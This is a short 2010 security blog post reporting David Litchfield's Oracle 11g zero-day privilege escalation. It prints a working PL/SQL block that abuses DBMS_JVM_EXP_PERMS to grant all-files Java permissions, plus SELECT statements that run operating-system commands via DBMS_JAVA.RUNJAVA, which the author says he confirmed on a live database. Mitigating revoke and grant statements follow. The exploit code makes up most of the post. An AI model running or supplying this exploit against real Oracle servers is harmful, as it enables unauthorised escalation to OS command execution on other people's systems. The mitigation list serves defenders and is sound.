Oracle 11g 0day exploit published

I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is was online.

<<UPDATE>> The video was removed from the Blackhat website. <<UPDATE>>

David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

For security reasons you should:

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.

SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(’oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3′);

Dieser Eintrag wurde am 4 Feb 2010 um 22:27 verfasst und befindet sich in Exploit, David Litchfield. Sie können alle Antworten zu diesem Eintrag über den Feed RSS 2.0 mitverfolgen. Antworten sind derzeit nicht möglich, aber Sie können einen Trackback-Link von Ihrer eigenen Seite setzen.

| Drucken